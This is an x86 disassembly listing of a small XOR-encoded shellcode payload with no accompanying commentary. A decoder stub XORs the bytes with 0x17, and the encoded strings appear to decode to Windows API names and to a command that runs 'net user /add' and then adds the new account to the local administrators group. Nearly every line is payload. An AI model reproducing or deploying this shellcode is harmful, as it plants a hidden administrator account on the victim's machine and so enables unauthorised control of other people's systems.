0x0        jmp 0x11                            \xeb\x0f                  ..        

     label_0x2:
0x2        pop eax                             \x58                      X         
0x3        xor byte ptr [eax], 0x17            \x80\x30\x17              .0.       
0x6        inc eax                             \x40                      @         
0x7        db 0x81                             \x81                      .         
0x8        8mazau ; string                    \x38\x6d\x61\x7a\x61\x75            
0xe        hlt                                 \xf4                      .         
0xf        jmp 0x16                            \xeb\x05                  ..        

     label_0x11:
0x11       call 2                              \xe8\xec\xff\xff\xff      .....     
     label_0x16:
0x16       db 0xfe                             \xfe                      .         
0x17       mov dh, 0x17                        \xb6\x17                  ..        
0x19       pop ss                              \x17                      .         
0x1a       pop ss                              \x17                      .         
0x1b       dec edx                             \x4a                      J         
     label_0x1c:
0x1c       inc edx                             \x42                      B         
0x1d       int3                                \x26\xcc                  &.        
0x1f       db 0x73 (!)                        \x73                      s         
0x20       db 0x9c (!)                        \x9c                      .         
0x21       adc al, 0x57                        \x14\x57                  .W        
0x23       test byte ptr [esp + edx*2 - 0x119da818], bl \x84\x9c\x54\xe8\x57\x62\xee..T.Wb.   
0x2a       pushfd                              \x9c                      .         
0x2b       inc esp                             \x44                      D         
0x2c       adc al, 0x71                        \x14\x71                  .q        
0x2e       lds esi, ptr es:[ecx - 0x51]        \x26\xc5\x71\xaf          &.q.      
0x32       pop ss                              \x17                      .         
0x33       pop es                              \x07                      .         
0x34       db 0x71 (!)                        \x71                      q         
0x35       db 0x96 (!)                        \x96                      .         
0x36       sub eax, 0x13634d5a                 \x2d\x5a\x4d\x63\x13      -ZMc.     
0x3b       aad 0xfc                            \x3e\xd5\xfc              >..       
0x3e       db 0xe2 (!)                        \xe2                      .         
0x3f       db 0x9e (!)                        \x9e                      .         
0x40       les ebx, ptr [ebp + ebp*2 + 0x14c0162b] \xc4\x9c\x6d\x2b\x16\xc0\x14..m+...   
0x47       dec eax                             \x48                      H         
0x48       outsd dx, dword ptr [esi]           \x6f                      o         
0x49       pushfd                              \x9c                      .         
0x4a       pop esp                             \x5c                      \         
0x4b       setl byte ptr [edi + esi - 0x64]    \x0f\x9c\x64\x37\x9c      ..d7.     
0x50       insb byte ptr es:[edi], dx          \x6c                      l         
0x51       xor edx, dword ptr [esi]            \x33\x16                  3.        
0x53       rcl dword ptr [esi], 0xc0           \xc1\x16\xc0              ...       
0x56       jmp 0x12                            \xeb\xba                  ..        

0x58       push ss                             \x16                      .         
0x59       mov dword ptr [ecx + 0x2646ea90], 0x18d697de \xc7\x81\x90\xea\x46\x26\xde\x97\xd6\x18....F&....
0x63       in al, 0xb1                         \xe4\xb1                  ..        
0x65       sbb eax, 0xea904e81                 \x65\x1d\x81\x4e\x90\xea  e..N..    
0x6b       arpl word ptr [eax], bx             \x63\x18                  c.        
0x6d       push eax                            \x50                      P         
0x6e       push eax                            \x50                      P         
0x6f       cmc                                 \xf5                      .         
0x70       int1                                \xf1                      .         
0x71       test eax, 0x17171718                \xa9\x18\x17\x17\x17      .....     
0x76       fnstcw word ptr ds:[esi]            \x3e\xd9\x3e              >.>       
0x79       db 0xe0 (!)                        \xe0                      .         
0x7a       db 0xfc (!)                        \xfc                      .         
0x7b       cld                                 \xfc                      .         
0x7c       xlatb                               \x26\xd7                  &.        
0x7e       jno 0x1c                            \x71\x9c                  q.        

0x80       adc dh, dl                          \x10\xd6                  ..        
0x82       not dword ptr [0x160b649c]          \xf7\x15\x9c\x64\x0b\x16  ...d..    
0x88       rcl dword ptr [esi], 0xd1           \xc1\x16\xd1              ...       
0x8b       mov edx, 0xd19ec716                 \xba\x16\xc7\x9e\xd1      .....     
0x90       sahf                                \x9e                      .         
0x91       ror byte ptr [edx - 0x66], 0x92     \xc0\x4a\x9a\x92          .J..      
0x95       or edx, dword ptr [edi]             \x0b\x17                  ..        
0x97       pop ss                              \x17                      .         
0x98       pop ss                              \x17                      .         
0x99       inc edi                             \x47                      G         
0x9a       inc eax                             \x40                      @         
0x9b       call 0x17128061                     \xe8\xc1\x7f\x12\x17      .....     
0xa0       pop ss                              \x17                      .         
0xa1       pop ss                              \x17                      .         
0xa2       lcall 0x4617:0x1717279a             \x9a\x9a\x27\x17\x17\x17\x46..'...F   
0xa9       call 0x33929b75                     \xe8\xc7\x9a\x92\x33      ....3     
0xae       pop ss                              \x17                      .         
0xaf       pop ss                              \x17                      .         
0xb0       pop ss                              \x17                      .         
0xb1       inc edi                             \x47                      G         
0xb2       inc eax                             \x40                      @         
0xb3       call 0x17178079                     \xe8\xc1\x7f\x17\x17      .....     
0xb8       pop ss                              \x17                      .         
0xb9       pop ss                              \x17                      .         
0xba       call 0xe84e0086                     \xe8\xc7\xff\x4d\xe8      ...M.     
0xbf       db 0xe8                             \xe8                      .         
0xc0       db 0xe8                             \xe8                      .         
0xc1       PrcGextVsserdd ; string            \x50\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64          
0xcf       db 0x17 (!)                        \x17                      .         
0xd0       [xvs[~uevenV ; string              \x5b\x78\x76\x73\x5b\x7e\x75\x65\x76\x65\x6e\x56          
0xdc       db 0x17 (!)                        \x17                      .         
0xdd       @~yRort ; string                   \x40\x7e\x79\x52\x6f\x72\x74          
0xe4       db 0x17 (!)                        \x17                      .         
0xe5       Ro~cGextrdd ; string               \x52\x6f\x7e\x63\x47\x65\x78\x74\x72\x64\x64          
0xf0       db 0x17 (!)                        \x17                      .         
0xf1       tzs78t7yrc7bdre78vss7d{~z7d ; string\x74\x7a\x73\x37\x38\x74\x37\x79\x72\x63\x37\x62\x64\x72\x65\x37\x38\x76\x73\x73\x37\x64\x7b\x7e\x7a\x37\x64          
0x10c      db 0x7f (!)                        \x7f                      .         
0x10d      vsn11yrc7{xtv{pexbg78vss7 ; string \x76\x73\x6e\x31\x31\x79\x72\x63\x37\x7b\x78\x74\x76\x7b\x70\x65\x78\x62\x67\x37\x38\x76\x73\x73\x37          
0x126      div ebx                             \xf7\xf3                  ..        
0x128      sti                                 \xfb                      .         
0x129      db 0xff                             \xff                      .         
0x12a      cli                                 \xfa                      .         
0x12b      jmp esi                             \xff\xe6                  ..        

0x12d      in eax, 0xe7                        \xe5\xe7                  ..        
0x12f      mul ebp                             \xf7\xe5                  ..        
0x131      stc                                 \xf9                      .         
0x132      out 0xec, eax                       \xe7\xec                  ..        
0x134      aaa                                 \x37                      7         
0x135      db 0x64 (!)                        \x64                      d         
0x136      db 0x7b (!)                        \x7b                      {         
0x137      db 0x7e (!)                        \x7e                      ~         
0x138      db 0x7a (!)                        \x7a                      z         
0x139      db 0x17 (!)                        \x17                      .         
0x13a      insd dword ptr es:[edi], dx         \x6d                      m         
0x13b      popal                               \x61                      a         
0x13c      db 0x7a (!)                        \x7a                      z         
0x13d      db 0x61 (!)                        \x61                      a         
